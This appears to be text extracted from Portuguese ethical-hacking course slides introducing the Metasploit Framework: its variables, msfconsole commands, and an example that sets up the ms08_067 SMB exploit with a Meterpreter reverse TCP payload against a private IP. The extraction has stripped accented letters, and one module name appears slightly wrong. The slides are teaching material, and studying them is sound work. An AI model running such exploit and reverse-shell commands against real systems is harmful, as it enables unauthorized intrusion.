Metasploit Framework

Marcos Flvio Arajo Assuno

Fundamentos de Ethical Hacking
Criado por HD Moore, hoje o framework de
explorao de falhas mais utilizado.

Extremamente customizvel;
Atualizaes frequentes;
Possibilidade de criao de scripts;
Muitas opes de payloads;
Mtodos para se burlar firewalls e
anti-vrus;
Meterpreter;
Interface console, gui (Armitage) e
web;
O Metasploit Framework (MSF) vem com muitos utilitrios para
auxiliar na realizao da explorao. Vamos estudar os principais:
msfconsole e msfvenom.

Metasploit
Sute completa
Variveis do Metasploit
So usadas em todos os comandos do MSF. Ex: msfconsole, msfcli,
msfpayload, etc. As principais so:

LHOST: IP local
LPORT: Porta local
RHOST: IP remoto
SRVHOST: IP do servio
PAYLOAD: Tipo de payload
TARGET: Tipo de alvo
Mtodo mais utilizado para uso do MSF. um console que
permite escolher interativamente exploits, utilitrios, payloads e
configurar as devidas variveis.

Msfconsole
Comandos do MSFCONSOLE
search <nome>: Pesquisa mdulo de exploit
use <nome>: Utiliza mdulo de exploit
show <argumento>: Mostra informaes referentes
ao mdulo. O argumento pode ser: exploits,
options, payloads ou auxiliares.
set <varivel>: Configura um valor em uma
varivel.
Ex: LHOST, LPORT, PAYLOAD, etc.
unset <varivel>: Desconfigura uma varivel.
exploit: Realiza a explorao aps as variveis
terem sido configuradas.
search ms12

Msfconsole
Exemplo search
use exploit/windows/smb/ms08_06_netapi

Msfconsole
Exemplo use
show payloads

Msfconsole
Exemplo show
set LHOST 192.168.10.1
set LPORT 443
set RHOST 192.168.10.2

Msfconsole
Exemplo set
set PAYLOAD
windows/meterpreter/reverse_tcp
show options

Msfconsole
set payload e
show options
Depois de todas as variveis j devidamente configuradas para
executar o comando exploit para realizar a explorao:

Msfconsole
Exploit